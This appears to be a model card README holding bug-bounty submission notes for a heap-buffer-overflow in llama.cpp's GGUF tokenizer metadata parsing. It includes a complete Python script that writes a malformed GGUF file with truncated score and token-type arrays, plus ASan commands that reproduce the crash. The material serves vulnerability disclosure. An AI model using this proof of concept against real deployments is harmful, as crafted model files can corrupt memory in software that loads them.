Add model card metadata header

d6f1a63 verified about 1 month ago

4.52 kB

	---
	license: other
	language:
	- en
	tags:
	- security
	- gguf
	- poc
	- llama-cpp
	- huntr
	library_name: llama-cpp
	---

	# Huntr submission notes

	This folder contains a status summary and repro steps for a GGUF heap-buffer-overflow in tokenizer metadata parsing.

	Files
	- huntr_submission/STATUS.md

	PoC model file
	- tmp/gguf_fuzz/llama-spm-bad-scores.gguf

	Base model file
	- models/ggml-vocab-llama-spm.gguf

	PoC generation
	- The PoC is created by truncating tokenizer.ggml.scores and tokenizer.ggml.token_type by 1 element.
	- Script used:

	```python
	import struct
	from pathlib import Path

	in_path = Path('models/ggml-vocab-llama-spm.gguf')
	out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')

	GGUF_TYPE_SIZES = {
	0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
	}
	GGUF_TYPE_FORMAT = {
	0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
	}

	def read_exact(f, n):
	b = f.read(n)
	if len(b) != n:
	raise EOFError('unexpected EOF')
	return b

	def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0]
	def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0]
	def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0]
	def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0]

	def read_string(f):
	n = read_u64(f)
	return read_exact(f, n)

	def parse_file(path):
	with open(path, 'rb') as f:
	magic = read_exact(f, 4)
	version = read_u32(f)
	n_tensors = read_i64(f)
	n_kv = read_i64(f)
	kv_list = []
	for _ in range(n_kv):
	key = read_string(f)
	vtype = read_i32(f)
	if vtype == 9:
	arr_type = read_i32(f)
	arr_len = read_u64(f)
	if arr_type == 8:
	vals = [read_string(f) for _ in range(arr_len)]
	else:
	size = GGUF_TYPE_SIZES[arr_type]
	data = read_exact(f, size * arr_len)
	fmt = GGUF_TYPE_FORMAT[arr_type]
	vals = list(struct.unpack('<' + fmt[1] * arr_len, data))
	kv_list.append((key, vtype, arr_type, vals))
	elif vtype == 8:
	val = read_string(f)
	kv_list.append((key, vtype, None, val))
	else:
	size = GGUF_TYPE_SIZES[vtype]
	val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
	kv_list.append((key, vtype, None, val))
	return magic, version, n_tensors, kv_list

	def write_file(path, magic, version, n_tensors, kv_list):
	with open(path, 'wb') as f:
	f.write(magic)
	f.write(struct.pack('<I', version))
	f.write(struct.pack('<q', n_tensors))
	f.write(struct.pack('<q', len(kv_list)))
	for key, vtype, arr_type, val in kv_list:
	f.write(struct.pack('<Q', len(key)))
	f.write(key)
	f.write(struct.pack('<i', vtype))
	if vtype == 9:
	f.write(struct.pack('<i', arr_type))
	f.write(struct.pack('<Q', len(val)))
	if arr_type == 8:
	for s in val:
	f.write(struct.pack('<Q', len(s)))
	f.write(s)
	else:
	fmt = GGUF_TYPE_FORMAT[arr_type]
	f.write(struct.pack('<' + fmt[1] * len(val), *val))
	elif vtype == 8:
	f.write(struct.pack('<Q', len(val)))
	f.write(val)
	else:
	f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))

	magic, version, n_tensors, kv_list = parse_file(in_path)
	new_kv = []
	for key, vtype, arr_type, val in kv_list:
	if key == b'tokenizer.ggml.scores' and vtype == 9:
	val = val[:-1]
	if key == b'tokenizer.ggml.token_type' and vtype == 9:
	val = val[:-1]
	new_kv.append((key, vtype, arr_type, val))

	write_file(out_path, magic, version, n_tensors, new_kv)
	print('wrote', out_path)
	```

	Repro (ASan)
	```bash
	cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
	cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
	./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"
	```